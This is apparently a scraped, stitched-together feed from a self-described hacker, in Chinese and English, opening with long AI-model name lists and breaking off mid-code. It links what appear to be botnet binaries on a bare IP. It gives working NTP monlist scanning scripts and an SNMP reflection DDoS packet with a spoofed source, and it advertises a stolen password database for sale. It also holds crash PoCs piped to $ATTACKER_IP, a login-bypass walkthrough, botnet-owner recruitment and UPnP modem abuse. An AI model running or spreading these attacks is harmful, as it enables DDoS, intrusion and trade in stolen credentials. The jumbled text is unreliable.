447. suno_lyrics
448. suno_music
449. suno_upload
450. swap_face
451. text-davinci-002
452. text-davinci-003
453. text-embedding-3-large
454. text-embedding-3-small
455. text-embedding-ada-002
456. text-embedding-v3
457. tts-1
458. tts-1-1106
459. tts-1-hd
460. tts-1-hd-1106
461. veo3.1
462. veo3.1-fast
463. veo3.1-fast-fl
464. veo3.1-fl
465. veo3.1-landscape
466. veo3.1-landscape-4k
467. veo3.1-landscape-fl
468. veo3.1-landscape-fl-4k
469. veo3.1-landscape-fl-hd
470. veo3.1-landscape-hd
471. veo3.1-portrait
472. veo3.1-portrait-4k
473. veo3.1-portrait-fl
474. veo3.1-portrait-fl-4k
475. veo3.1-portrait-fl-hd
476. veo3.1-portrait-hd
477. veo3.1-pro
478. whisper-1
请选择你的队友
134. gemini-3-flash-preview-low
135. gemini-3-flash-preview-nothinking
136. gemini-3-flash-preview-thinking
137. gemini-3-pro-image-preview
138. gemini-3-pro-image-preview-2k
139. gemini-3-pro-image-preview-4k
140. gemini-3-pro-preview
141. gemini-3-pro-preview-high
142. gemini-3-pro-preview-low
143. gemini-3-pro-preview-thinking
144. gemini-3-pro-preview-thinking-128
145. gemini-3-pro-preview-thinking-512
146. gemini-3-pro-preview-thinking-high
147. gemini-3-pro-preview-thinking-low
148. gemini-3.1-flash-image-preview
149. gemini-3.1-flash-image-preview-2k
150. gemini-3.1-flash-image-preview-4k
151. gemini-3.1-flash-lite-preview
152. gemini-3.1-pro-preview
153. gemini-3.1-pro-preview-high
154. gemini-3.1-pro-preview-low
155. gemini-3.1-pro-preview-medium
156. gemini-3.1-pro-preview-thinking-low
157. gemini-exp-1206
158. gemini-flash-latest-thinking
159. gemini-flash-lite-latest
160. gemini-flash-lite-latest-nothinking
161. gemini-flash-lite-latest-thinking
162. gemini-pro
163. gemini-pro-latest
164. glm-3-turbo
165. glm-4
166. glm-4-0520
167. glm-4-9b-chat
168. glm-4-air
169. glm-4-airx
170. glm-4-all
171. glm-4-flash
172. glm-4-flashx
173. glm-4-long
174. glm-4-plus
175. glm-4.1v-thinking-flashx
176. glm-4.5
177. glm-4.5-air
178. glm-4.5-airx
179. glm-4.5-flash
180. glm-4.5-x
181. glm-4.5v
182. glm-4.6
183. glm-4.6-thinking
184. glm-4.7
185. glm-4v
186. glm-4v-flash
187. glm-4v-plus
188. glm-zero
189. glm-zero-preview
190. gpt-3.5-turbo
191. gpt-3.5-turbo-0125
192. gpt-3.5-turbo-1106
193. gpt-3.5-turbo-16k
194. gpt-3.5-turbo-16k-0613
195. gpt-3.5-turbo-instruct
196. gpt-4
197. gpt-4-0125-preview
198. gpt-4-0613
199. gpt-4-1106-preview
200. gpt-4-32k
201. gpt-4-32k-0613
202. gpt-4-all
203. gpt-4-gizmo
204. gpt-4-gizmo-*
205. gpt-4-gizmo-g-Er3vSJZu1
206. gpt-4-gizmo-g-YyyyMT9XH
207. gpt-4-gizmo-g-Zmlrpl0Fv
208. gpt-4-turbo
209. gpt-4-turbo-2024-04-09
210. gpt-4-turbo-preview
211. gpt-4-v
212. gpt-4-vision-preview
213. gpt-4.1
214. gpt-4.1-2025-04-14
215. gpt-4.1-mini
216. gpt-4.1-mini-2025-04-14
217. gpt-4.1-nano
218. gpt-4.1-nano-2025-04-14
219. gpt-4o
220. gpt-4o-2024-05-13
221. gpt-4o-2024-08-06
222. gpt-4o-2024-11-20
223. gpt-4o-all
224. gpt-4o-audio-preview
225. gpt-4o-audio-preview-2024-12-17
226. gpt-4o-image
227. gpt-4o-image-vip
228. gpt-4o-mini
229. gpt-4o-mini-2024-07-18
230. gpt-4o-mini-audio-preview-2024-12-17
231. gpt-4o-mini-tts
232. gpt-4o-realtime-preview
233. gpt-4o-realtime-preview-2024-10-01
234. gpt-4o-realtime-preview-2024-12-17
235. gpt-4o-search-preview
236. gpt-4o-search-preview-2025-03-11
237. gpt-5
238. gpt-5-2025-08-07
239. gpt-5-all
240. gpt-5-chat
241. gpt-5-chat-2025-08-07
242. gpt-5-chat-latest
243. gpt-5-codex
244. gpt-5-codex-high
245. gpt-5-codex-low
246. gpt-5-codex-medium
247. gpt-5-high
248. gpt-5-medium
249. gpt-5-mini
250. gpt-5-mini-2025-08-07
251. gpt-5-nano
252. gpt-5-nano-2025-08-07
253. gpt-5-thinking
254. gpt-5-thinking-all
255. gpt-5.1
256. gpt-5.1-2025-11-13
257. gpt-5.1-all
258. gpt-5.1-chat-latest
259. gpt-5.1-codex
260. gpt-5.1-codex-high
261. gpt-5.1-codex-max
262. gpt-5.1-codex-max-xhigh
263. gpt-5.1-codex-medium
264. gpt-5.1-codex-mini
265. gpt-5.1-high
266. gpt-5.1-medium
267. gpt-5.1-thinking
268. gpt-5.1-thinking-all
269. gpt-5.2
270. gpt-5.2-all
271. gpt-5.2-chat
272. gpt-5.2-chat-latest
273. gpt-5.2-codex
274. gpt-5.2-codex-high
275. gpt-5.2-codex-xhigh
276. gpt-5.2-high
277. gpt-5.2-thinking
278. gpt-5.2-xhigh
279. gpt-5.3-chat-latest
280. gpt-5.3-codex
281. gpt-5.3-codex-high
282. gpt-5.3-codex-medium
283. gpt-5.3-codex-xhigh
284. gpt-5.4
285. gpt-5.4-high
286. gpt-5.4-xhigh
287. gpt-image-1
288. gpt-image-1-vip
289. gpt-image-1.5
290. gpt-oss-120b
291. gpt-oss-20b
292. grok-3
293. grok-3-deepsearch
294. grok-3-fast
295. grok-3-reasoner
296. grok-3-reasoning
297. grok-4
298. grok-4-0709
299. grok-4-deepsearch
300. grok-4-fast
301. grok-4-fast-expert
302. grok-4-fast-reasoning
303. grok-4-reasoning
304. grok-4-search
305. grok-4.1
306. grok-4.20-beta
请选择你的队友
1. chatgpt-4o-latest
2. claude-3-5-haiku-20241022
3. claude-3-5-haiku-latest
4. claude-3-5-sonnet-20240620
5. claude-3-5-sonnet-20241022
6. claude-3-5-sonnet-latest
7. claude-3-7-sonnet-20250219
8. claude-3-7-sonnet-20250219-thinking
9. claude-3-haiku-20240307
10. claude-3-sonnet-20240229
11. claude-haiku-4-5-20251001
12. claude-haiku-4-5-20251001-thinking
13. claude-opus-4-1-20250805
14. claude-opus-4-1-20250805-thinking
15. claude-opus-4-20250514
16. claude-opus-4-20250514-thinking
17. claude-opus-4-5-20251101
18. claude-opus-4-5-20251101-thinking
19. claude-opus-4-6
20. claude-opus-4-6-thinking
21. claude-sonnet-4-20250514
22. claude-sonnet-4-20250514-thinking
23. claude-sonnet-4-5-20250929
24. claude-sonnet-4-5-20250929-thinking
25. claude-sonnet-4-6
26. claude-sonnet-4-6-thinking
27. command
28. command-light
29. command-light-nightly
30. command-nightly
31. command-r
32. command-r-03-2024
33. command-r-08-2024
34. command-r-plus
35. command-r-plus-04-2024
36. command-r-plus-08-2024
37. command-r7b-12-2024
38. dall-e-3
39. deepseek-chat
40. deepseek-ocr
41. deepseek-r1
42. deepseek-r1-0528
43. deepseek-r1-2025-01-20
44. deepseek-r1-250120
45. deepseek-r1-250528
46. deepseek-reasoner
47. deepseek-v3
48. deepseek-v3-0324
49. deepseek-v3-1
50. deepseek-v3-1-250821
51. deepseek-v3-1-think-250821
52. deepseek-v3-250324
53. deepseek-v3.1
54. deepseek-v3.1-thinking
55. deepseek-v3.2
56. deepseek-v3.2-exp
57. deepseek-v3.2-thinking
58. doubao-1-5-pro-32k-250115
59. doubao-1-5-thinking-vision-pro-250428
60. doubao-1-5-vision-pro-32k-250115
61. doubao-1.5-pro-256k
62. doubao-1.5-pro-32k
63. doubao-1.5-vision-pro-250328
64. doubao-pro-32k
65. doubao-seed-1-6-250615
66. doubao-seed-1-6-251015
67. doubao-seed-1-6-flash-250615
68. doubao-seed-1-6-flash-250828
69. doubao-seed-1-6-lite-251015
70. doubao-seed-1-6-thinking-250615
71. doubao-seed-1-6-thinking-250715
72. doubao-seed-1-6-vision-250815
73. doubao-seed-code-preview-251028
74. doubao-seedance-1-0-pro-250528
75. doubao-seedance-1-0-pro-fast-251015
76. doubao-seedance-1-5-pro-251215
77. doubao-seedance-2-0_10s_720p
78. doubao-seedance-2-0_11s_720p
79. doubao-seedance-2-0_12s_720p
80. doubao-seededit-3-0-i2i-250628
81. doubao-seedream-4-0-250828
82. doubao-seedream-4-5-251128
83. doubao-seedream-5-0-260128
84. doubao-vision-pro-32k
85. gemini-1.5-flash-latest
86. gemini-1.5-pro-latest
87. gemini-2.0-flash
88. gemini-2.0-flash-001
89. gemini-2.0-flash-lite
90. gemini-2.0-flash-lite-001
91. gemini-2.0-flash-lite-preview
92. gemini-2.0-flash-lite-preview-02-05
93. gemini-2.0-flash-thinking-exp
94. gemini-2.0-flash-thinking-exp-01-21
95. gemini-2.0-flash-thinking-exp-1219
96. gemini-2.0-pro-exp
97. gemini-2.0-pro-exp-02-05
98. gemini-2.5-flash
99. gemini-2.5-flash-all
100. gemini-2.5-flash-deepsearch
101. gemini-2.5-flash-deepsearch-async
102. gemini-2.5-flash-image
103. gemini-2.5-flash-image-preview
104. gemini-2.5-flash-lite
105. gemini-2.5-flash-lite-nothinking
106. gemini-2.5-flash-lite-preview-06-17
107. gemini-2.5-flash-lite-preview-06-17-thinking
108. gemini-2.5-flash-lite-preview-09-2025
109. gemini-2.5-flash-lite-thinking
110. gemini-2.5-flash-nothinking
111. gemini-2.5-flash-preview-04-17
112. gemini-2.5-flash-preview-04-17-nothinking
113. gemini-2.5-flash-preview-04-17-thinking
114. gemini-2.5-flash-preview-05-20
115. gemini-2.5-flash-preview-05-20-nothinking
116. gemini-2.5-flash-preview-09-2025
117. gemini-2.5-flash-preview-09-2025-thinking
118. gemini-2.5-flash-thinking
119. gemini-2.5-flash-video
120. gemini-2.5-pro
121. gemini-2.5-pro-all
122. gemini-2.5-pro-deepsearch
123. gemini-2.5-pro-deepsearch-async
124. gemini-2.5-pro-exp-03-25
125. gemini-2.5-pro-nothinking
126. gemini-2.5-pro-preview-03-25
127. gemini-2.5-pro-preview-03-25-thinking
128. gemini-2.5-pro-preview-05-06
129. gemini-2.5-pro-preview-05-06-thinking
130. gemini-2.5-pro-preview-06-05
131. gemini-2.5-pro-preview-06-05-thinking
132. gemini-2.5-pro-thinking
133. gemini-3-flash-preview
请选择你的队友
纯净的住宅IP是实现某些特殊业务的前提,比如跨境电商,运营tiktok,解锁流媒体,薅甲骨文永久免费VPS等.
而住宅IP一般以HTTP或者SOCKS代理的形式出售 这 就很可疑了.
正所谓有需求的地方,就有利益.僵尸网络控制的节点天然适合构建住宅代理,这似乎是近年来DDoS圈的一个潮流,把业务从单一的攻击,扩展到网络代理.
比如大盘子的业务涵盖流量代理,DDoS攻击,互联网提供内容的服务盗版流量等.
所以今天,我带来一个惊人的发布.
那就是教你零元购住宅IP!
https://github.com/bytecategory/homeip/blob/main/homeip.html
http://156.229.164.94/n2/x86
听说你这段时间一直在搞我 没完了?看来你是真想和我拼一下了.
http://156.229.164.94/n2/tbk
跟我bytecategory拼你有这个实力吗
http://156.229.164.94/n2/mpsl
你也算是不识抬举的人了
masscan 0.0.0.0/0 -pU:123 -oX ntp.xml --rate 160000 --exclude 255.255.255.255
from lxml import etree
port = None
address = None
parsedServers = []
# Opens the file used to store single enteries.
outputFile = open('output.txt', 'a')
# Iterates through the masscan XML file.
for event, element in etree.iterparse('ntp.xml', tag="host"):
for child in element:
if child.tag == 'address':
# Assigns the current iterations address to the address variable.
address = child.attrib['addr']
if child.tag == 'ports':
for a in child:
# Assigns the current iterations port to the port variable.
port = a.attrib['portid']
# is both port and IP address are present.
if port != None and address != None:
# If the IP hasnt yet been added to the output file.
if address not in parsedServers:
print(address)
# Write the IP address to the file.
outputFile.write(address + '\n')
# write the IP to the parsedServers list
parsedServers.append(address)
port = None
address = None
element.clear()
outputFile.close()
print('End')
from scapy.all import *
import _thread
# Raw packet data used to request Monlist from NTP server
rawData = "\x17\x00\x03\x2a" + "\x00" * 61
# File containing all IP addresses with NTP port open.
logfile = open('output.txt', 'r')
# Output file used to store all monlist enabled servers
outputFile = open('monlistServers.txt', 'a')
def sniffer():
# Sniffs incomming network traffic on UDP port 48769, all packets meeting thease requirements run through the analyser function.
sniffedPacket = sniff(filter="udp port 48769", store=0, prn=analyser)
def analyser(packet):
# If the server responds to the GET_MONLIST command.
print(len(packet))
if len(packet) > 200:
if packet.haslayer(IP):
print(packet.getlayer(IP).src)
# Outputs the IP address to a log file.
outputFile.write(packet.getlayer(IP).src + '\n')
_thread.start_new_thread(sniffer, ())
for address in logfile:
# Creates a UDP packet with NTP port 123 as the destination and the MON_GETLIST payload.
address=address.strip()
send(IP(dst=address)/UDP(sport=48769, dport=123)/Raw(load=rawData))
print('End')
I ran them, and then the IP risk value dropped to 14.
Your code is below
c=Raw(load=b"\x17\x00\x03\x2a" + b"\x00" * 44)
your code
My code is below
b = NTP(leap=0,version=2,mode=7,stratum=0,poll=3,precision=42,delay=0,dispersion=0,ref_id=0,ref=0,orig=0,recv=0,sent=0)
my code
The two are the same.
You can verify this by running
bytes(c).hex() == bytes(b).hex()
But When I visited https://github.com/search?q=precision=42&type=code, oh my god, why do so many NTP reflection tools use this single-byte int8 value of 42?
The origin of this issue is that a program by pangzi.me@gmail.com at http://drops.wooyun.org/papers/926 used 42, and then a whole bunch of script kiddies copied 42.(hint: The WooYun website is no longer accessible, but my mentor made a backup on https://web.archive.org .)
the origin of this issue
Fortunately, some of it was written by yourself and not by AI, which can be seen from the fact that you spelled adapter as adepter.
今天,还要特别感谢 @Officialwhyte22
的这篇推文 http://x.com/Officialwhyte22/status/2025164814180331798
PS C:\Users\Administrator> whoami
desktop-t5qs5ms\administrator
PS C:\Users\Administrator> get-date2026年2月22日 17:28:49PS C:\Users\Administrator> get-netadapter | select-object name,statname Status LinkSpeed---- ------ ---------
OpenVPN TAP-Windows6 Disconnected 1 Gbps
Ethernet0 Up 1 GbpsPS C:\Users\Administrator> get-netipinterface | sort-object interfa
ily,interfacemetric | select-object -first 6InterfaceAliasias AddressFamily interfacemetric----------------- ------------- ---------------
IPv4 25
IPv4 25
IPv6 25
IPv6 25
IPv4 75
IPv6 75PS C:\Users\Administrator> route print | select-string "0.0.0.0" 0.0.0.0 0.0.0.0 192.168.110.1 192.168.110.4
224.0.0.0 240.0.0.0 在链路上 127.
224.0.0.0 240.0.0.0 在链路上 192.168.1PS C:\Users\Administrator> Get-NetTCPConnection -state Established
localaddress,localport,remoteaddress,remoteport,owningprocesslocaladdress : 192.168.110.47
localport : 1541
remoteaddress : 4.145.79.82
remoteport : 443
owningprocess : 68localaddress : 192.168.110.47
localport : 1941
remoteaddress : 117.21.204.18
remoteport : 443
owningprocess : 2140localaddress : 192.168.110.47
localport : 1943
remoteaddress : 2.23.244.9
remoteport : 443
owningprocess : 2140localaddress : 192.168.110.47
localport : 1939
remoteaddress : 117.21.204.18
remoteport : 443
owningprocess : 2140localaddress : 192.168.110.47
localport : 1937
remoteaddress : 117.21.204.18
remoteport : 443
owningprocess : 2140localaddress : 192.168.110.47
localport : 1938
remoteaddress : 117.21.204.18
remoteport : 443
owningprocess : 2140localaddress : 192.168.110.47
localport : 1947
remoteaddress : 2.23.244.9
remoteport : 443
owningprocess : 2140localaddress : 192.168.110.47
localport : 1954
remoteaddress : 72.247.234.254
remoteport : 80
owningprocess : 2140PS C:\Users\Administrator> get-process -id 4Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessNa------- ------ ----- ----- ------ -- -- ---------
2356 0 140 124 71.30 4 0 System
给中国的朋友:
这就是@grok
认为的金玉良言, 我认为这是幼儿园的把戏, 脚本小子都要笑掉大牙.
你为什么要在简介里说自己是道德黑客?你连黑客的门槛都摸不到, 先学点本事再来炫耀吧.
你那套愚蠢的功夫说辞居然还有9.9万查看, 我一边吃饭一边笑的肚子都疼了, 我女朋友还得拍拍我的背安慰我.
执行几个cmdlet把你牛逼的,就像我永远自由一样,你注定永远平庸.
https://x.com/Officialwhyte22/status/2025164814180331798
导言
上古时代,乌云网的武林秘籍 http://drops.wooyun.org/tips/2106 ,我现在就要为"基于snmp的反射攻击的理论及其实现"重塑肉身.
snmp的用途
snmp用以监测连接到网络上的设备是否有任何引起管理上关注的情况,这里攻击最理想的是2c版本.
我选取了一个仓库从16进制给你们see see.
https://github.com/vpnguy-zz/snmpdos/blob/master/snmpdos.py
21 packet = IP(dst=snmpserver,src=target)/UDP(sport=161,dport=161)/Raw(load=data)
由UDP layer可知,snmp是基于udp的,为攻击target,作者把src赋值成target,这样target就会被反射了,呵呵.
正文
data是什么?
#Magic Packet getBulkEequest
data = b"\x30\x37\x02\x01" #snmp
data += b"\x01" #v2
data += b"\x04\x06\x70\x75\x62\x6c\x69\x63" #community=public
data += b"\xa5\x2a\x02\x04\x06\x29\x07\x31\x02\x01\x00\x02\x01\x0a\x30\x1c\x30\x0b\x06\x07\x2b\x06\x01\x02\x01\x01\x01\x05\x00\x30\x0d\x06\x09\x2b\x06\x01\x02\x01\x01\x09\x01\x03\x05\x00" #getBulkRequest
从rfc的 $\textcolor{red}{\textsf{ version(1) -- modified from RFC 1157 }}$ 可知v2这个注释没毛病.
pdu难如登天,莫慌,柿子挑软的捏
例一
```
SNMP(version="v2c",
community='public',
PDU=SNMPbulk(id=114514,
max_repetitions=100,
varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1')),
SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1'))]
)
)
```
例一是从 https://github.com/jevalenciap/snmpddos/blob/master/snmpddos.py 抄袭而来.
它的16进制 303402010104067075626c6963a527020301bf52020100020164301a300b06072b0601020101010500300b06072b0601020101010500
from ber_tlv.tlv import Tlv
raw_bytes = bytes.fromhex(c)
decoded_list = Tlv.parse(raw_bytes)
decoded_list
[(48,
[(2, b'\x01'),
(4, b'public'),
(165,
[(2, b'\x01\xbfR'),
(2, b'\x00'),
(2, b'd'),
(48,
[(48, [(6, b'+\x06\x01\x02\x01\x01\x01'), (5, b'')]),
(48, [(6, b'+\x06\x01\x02\x01\x01\x01'), (5, b'')])])])])]
要是我没猜错的话,b'+\x06\x01\x02\x01\x01\x01'与oid同宗同源,用pyasn1验证一下
from pyasn1.type import univ
from pyasn1.codec.ber import decoder
import binascii
\x2b就是b'+',oid的asn.1 tag number是06,而b'+\x06\x01\x02\x01\x01\x01'的长度是7,16进制0x07.
在303402010104067075626c6963a527020301bf52020100020164301a300b06072b0601020101010500300b06072b0601020101010500里共有两个06072b,
因为代码里出现了两次oid.
oid = binascii.unhexlify('06072b0601020101010500')
decoder.decode(oid)
(<ObjectIdentifier value object, tagSet <TagSet object, tags 0:0:6>, payload [1.3.6.1.2.1.1.1]>,
b'\x05\x00')
果然它是1.3.6.1.2.1.1.1!后面的05 00是NULL TYPE,不必管它.
oid是什么呢?
oid指的是对象标识符
eg.1 腾讯公司的oid:1.3.6.1.4.1.41475
eg.2 谷歌公司的oid:1.3.6.1.4.1.11129
三克 iana给了Tencent一个oid,从今以后QQ变成头文件里的隐式声明了,我们只需要说:1.3.6.1.4.1.41475又扫我盘,法克鱿.
(4, b'public')中的public是一个OCTET STRING,而octet的tag number是4,16进制0x04.
community -- community name
OCTET STRING,
165是什么
165 16进制0xa5
GetBulkRequest-PDU ::=
[5]
IMPLICIT BulkPDU
[5]是一个特定于上下文的标签
from pyasn1.type import univ, tag
from pyasn1.codec.ber import encoder
encoder.encode(univ.Sequence().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed,5))).hex()
a500
String tag="30";//tag标识域 SEQUENCE类型
SEQUENCE类型的tag是16,代码里是0x30,因为encoder.encode(univ.Sequence())[0]是48,48 16进制0x30,多说有益.
The encoding of a sequence value shall be constructed. ------ Recommendation ITU-T X.690
Bit 6 shall be set to zero if the encoding is primitive, and shall be set to one if the encoding is constructed.
翻译翻译
序列类型的编码是结构化的 第六位是一 第七位和第八位都是零(国际电信不会把它们设置成1 1,然后对卡西欧等厂商挥舞所谓的DMCA rtf文档.)
于是乎 0b00110000 十进制48 大功告成.
request-id 三十二位有符号整数(整数) 在例一里是114514,因为int.from_bytes(b'\x01\xbfR')是114514
在 https://github.com/jevalenciap/snmpddos/blob/master/snmpddos.py 里是RandNum(1,200000000) 可改成
RandNum(-2147483648, 2147483647)
I sell data.
You can preview https://raw.githubusercontent.com/bytecategory/ChessLeak/refs/heads/main/0.json
The Value of the Password key is an unsalted MD5 hash;but you must pay to see It.
0.json only represents 1/500 of the entrie leak.(I hacked the website recently.)
Contact me on Telegram https://t.me/bytecategory
The price will be very cheap.
raw.githubusercontent.com/kekyo/OuternetExplorer/refs/heads/main/oexplore.c
把int start()改成int main(void)
x86_64-w64-mingw32-gcc oexplore.c -o oexplore.exe -lole32 -loleaut32 -mwindows -luuid
运行oexplore.exe即可在IE中打开https://www.bing.com
https://b23.tv/ep407682
职位与方滨兴相当的杜跃进评价这是一个很典型的黑客的成长经历
我认为他是天才而非嘉豪,虽然我曾怀疑:"2:32 开机需要socket.hostbyaddr,还说返回的对象是str?命名init不符合PEP 8标准" 但后来才知自己的无知,这是节目包装罢了.
至于评论区里竟然有人说"中二病合集" "sql注入"
对此我只想回应一句:夏虫不可语冰,蟪蛄不知春秋.
Advice for webmaster(configuration file)
ls /etc/apache2/conf-available/security.conf
echo $?
if the output is 0.
vim /etc/apache2/conf-available/security.conf
else the output is 2.
vim $(grep -l -r --include="*.conf" "# Debian packages." / 2>/dev/null)
enter these on the keyboard in sequence
/[capslock]server[capslock]tokens[esc]n[capslock]n
change to ServerTokens Prod,and add
Header set X-Content-Type-Options: "nosniff"
Header set Cache-Control "no-cache,no-store,no-transform,must-revalidate"
they will prevent resource sniffing,and without cache
ChickenCoopGod(以下简称CCG)创作的2025贺岁冰山远控3.1的易语言代码如下
数据文本 = 解密数据 (数据文本, “Microsoft”, #DES算法)
DES密钥只有64位,为何他用了9个字节呢?
查阅
monvvv.github.io/2019/10/09/A-weird-way-of-DES-implementation-of-Elang.html
后得知易语言的DES和Crypto.Cipher的DES不一样
可惜其中get_new_key函数中也存在数组越界
建议monvvv复习一下<数据结构和算法>
Two Thousands Years Later...
这是当外网IP等于0
定位等于0
内网IP等于0
用户名等于0
CPU型号等于0
权限等于0
自身路径等于0
连接端口文本等于0
OS等于0
时的载荷
0d0f3e0308010000789cabfd5da1f1c1bd7a7d9af8b3ca3f0fe7f84ba72eab67586fa7f9e17fc0eea6d88f2a075b9fe72d72bdb229efe6eaff2b42d4f236aecd7c1d34d9b78363e3c7271a7e0b7f0af0e73d48da90a904d3e7935612b27c4a4a1f002c642cc6
所以还是建议CCG复习一下形式语言与自动机中的"正则语言"章节好用regular expression匹配一下IP.
毕竟连伟大导师编程随想也是有盲区的
当时CCG只有15岁,我想他的能力恐怕在我之上.
还是那句话,我一直很敬佩CCG.
github.com/ChickenCoopGod/Iceberg2.0
中管理与操作组件也存在数组越界漏洞
复现步骤
1. 将
import socket
import zlib
import binascii
import sys
t=r"a1192.168.1.1|8.8.8.8|root||"
t=t.encode('utf-8')
t=zlib.compress(t)
f=binascii.unhexlify("0d0f3e034a000000")
sys.stdout.buffer.write(f+t)
sys.stdout.buffer.flush()
保存为POC.py
2. 在bash中执行 python3 POC.py | nc $ATTACKER_IP 80
现象:Windows上的T-Safety 冰山远控2.0弹窗:
---------------------------
错误
---------------------------
运行时出错!
错误代码:1
错误信息:数组成员引用下标超出定义范围
67187164, 769
---------------------------
确定
---------------------------
echo -n "WeChatFF[@@@@#$%^&*()]$SOME_IP[@@@@#$%^&*()]520[@@@@#$%^&*()]" | nc $SOME_IP 80
冰山远控被我发现数组越界漏洞 POC如上
消息框文本如下
---------------------------
错误
---------------------------
运行时出错!
错误代码:1
错误信息:数组成员引用下标超出定义范围
67187164, 2475
---------------------------
确定
---------------------------
版本号2.0,该漏洞存在于冰山信箱组件中,影响全球超80用户(bushi
完了记得把cmd5_user.ini移动到回收站
分享cmd5.com中似乎天衣无缝的批量解密软件(他们一直被抄袭 从未被超越,我非常认可)
文件名 cmd5.exe
CRC32 4298FE4A
运行burpsuite后打开cmd5.exe
看到POST /Cmd5Service.asmx后do intercept response to this request
将Response中<CheckQqLoginResult>false</CheckQqLoginResult>中的false改成true
并把<user /><pass />改成<user>12345678@qq.com</user><pass>12345678</pass>后Forward
回到cmd5 crack
后关闭弹窗
---------------------------
---------------------------
登录成功,账户和密码已自动填写。
---------------------------
确定
---------------------------
现在浏览源文件 假如是0.txt
内容是25d55ad283aa400af464c76d713c07ad
点击批量破解
将第二个POST /batch.asmx的Response中(还是做之前一样的操作)的xml改成
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<Search2018Response xmlns="http://tempuri.org/">
<Search2018Result>1</Search2018Result>
<hashesOut> <string>25d55ad283aa400af464c76d713c07ad</string>
</hashesOut>
<results>
<string>I love you.</string>
</results>
<hashtype>0</hashtype>
<balance>114514</balance>
<id>114514</id>
<hashcount>1</hashcount>
<error>0</error>
<errmsg />
<MaxTasks>0</MaxTasks>
</Search2018Response>
</soap:Body>
</soap:Envelope>
代表已处理1 成功1 成功率100% 余额114514
打开同目录下的0_found.txt
可以看到25d55ad283aa400af464c76d713c07adI love you.
因为string在batchnew2018.cmd5.com:40000生成 你除非hack进这个host,否则做再多功课都没用啦.
给菜鸟看的,大佬就一边去叭.
To join gfwvector,you must meet one of the following qualifications:
1 download cloudflare-radar_top-1000000-domains...csv from radar.cloudflare.com
check if you have hacked any of these domains.
2 you own quite a few bots. like mirai.
3 you have over 100000 followers across the internet (besides video) by creating IT related content(this shows you are good at marketing)
Other talents
For examples: did you get over 5000 stars like the authors of NaïveProxy?
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body {
margin: 0;
padding: 0;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
overflow: hidden;
}
#bytecategory {
max-height: 100vh;
object-fit: contain;
transform-origin: center center;
image-rendering: smooth;
}
</style>
</head>
<body>
<img id="bytecategory" src="G9yNklha8AAJEsx.png">
<script>
const t=document.getElementById("bytecategory");let s=.777;t.style.transform="scale(${s})";const d=setInterval(()=>{s*=1.001;s>=1.4&&(clearInterval(d),setTimeout(()=>{let a=1;const b=setInterval(()=>{a-=.02;a<=0&&(a=0,clearInterval(b));t.style.opacity=a},20)},30));t.style.transform=`scale(${s})`},30);
</script>
</body>
</html>
在开始和VLESS玩耍前,我要先给大家介绍一下需要的主要工具.
监听和扫描:wireshark,telnet
应用层:nc(呵呵 nc也可以扫描 这里是gfwrev不严谨的地方),curl
编程语言:python3,json
建议以root账号运行wireshark
来自gfwrev的话:wireshark是报文监听的业界标准.
来自信息技术教科书的话:telnet命令是远程登陆程序,用于登录远程主机进行操作或者测试某个端口是否处于打开状态.
来自oracle的话:nc实用程序可用于TCP或UDP相关的各种任务.
来自Jim Hugunin的话:Guido对语言设计美学(Python)的深入理解让人震惊.
来自ECMA的话:json是一种轻量级的数据交换格式.
不过这句话"但nmap不适于细致的诊断和探索性研究,其脚本功能不够强大,网络层的发包听包能力也比较局限"
已经过时了,现在Nmap的NSE已经有612个,而当时Nmap只有59个NSE.
如果说没有NSE,Nmap也许和同时期诞生的其他软件一样早被人遗忘了.在2007年谷歌的代码之夏大会上Gordon Fyodor Lyon发布了NSE.
...
NSE中的脚本采用Lua语言编写,这门语言简单但是功能非常强大(来自李华峰的话)
因为x86_64-unknown-linux-gnu平台上版本7.98的Nmap的冷启动时间在46ms左右
而telnet的冷启动时间在5毫秒左右,又因为我没人关注,没人点赞,没人转贴,没人私信,度秒如年,所以不用nmap.
以上是工具群星闪耀时.
你们还可以自学
16进制到10进制
10进制到16进制
字符串到字节
字节到字符串
字节到16进制
16进制到字节
大端序 小端序和网络字节序
这爻似乎是初九.
2025年10月22日我在blogspot发布的文章
电信光猫允许的UPNP动作名
动作名 AddPortMapping 创建新的端口映射
NewRemoteHost 在大多数情况下 这将是一个空字符串
NewExternalPort NAT网关侦听的外部端口
NewProtocol 端口映射的协议 可能的值是TCP或UDP
NewInternalPort 内部客户端相应的内部端口
NewInternalClient 内部客户端的IP地址
NewPortMappingDescription 在用户界面显示端口映射的描述
NewLeaseDuration 以秒为单位 为0表示端口映射为静态
AddPortMappingResponse 动作名前置在'Response'前
SOAP 1.1-1.2规范
Envelope/Body元素
curl -s -H -d "XML DATA"
我这里给出SSDP载荷(参考Mirai变种 M-SEARCH * HTTP/1.1\r\nHOST: 255.255.255.255:1900\r\nMAN: \"ssdp:discover\"\r\nMX: 1\r\nST: urn:dial-multiscreen-org:service:dial:1\r\nUSER-AGENT: Google Chrome/60.0.3112.90 Windows\r\n\r\n)
M-SEARCH * HTTP/1.1\r\nHOST:192.168.1.1:1900\r\nMAN:"ssdp:discover"\r\nMX:5\r\nST:ssdp:all\r\n\r\n
只用socket的sendto和recvfrom找到Location,timeout设置为5
wget这个url,然后在文件中找controlURL,这里的UUID和Location中的UUID不同,不要去掉:1.
(其实你在文件资源管理器中的网上邻居中会看到Broadcom ADSL Router)
(Custom/1.0 UPnP/1.0 Proc/Ver 这是电信的Server)
动作名 GetExternalIPAddress 检索外部IP地址
动作名 GetConnectionTypeInfo 检索当前连接类型(也许是IP_Routed 即网关是LAN和WAN连接之间的IP路由器(路由模式))
要有SOAPAction
狩猎愉快(懂的都懂了)
翻译翻译
互联网上需要一个IP地址黑名单 它们是有危害的IP地址 🫡
为了收集它们 请一步一步操作
第一步 在/etc/apache2/apache2.conf中写入addtype application/x-httpd-php .htm html
第二步 在/var/www/html/index.html的body标签内写入
```
<?php
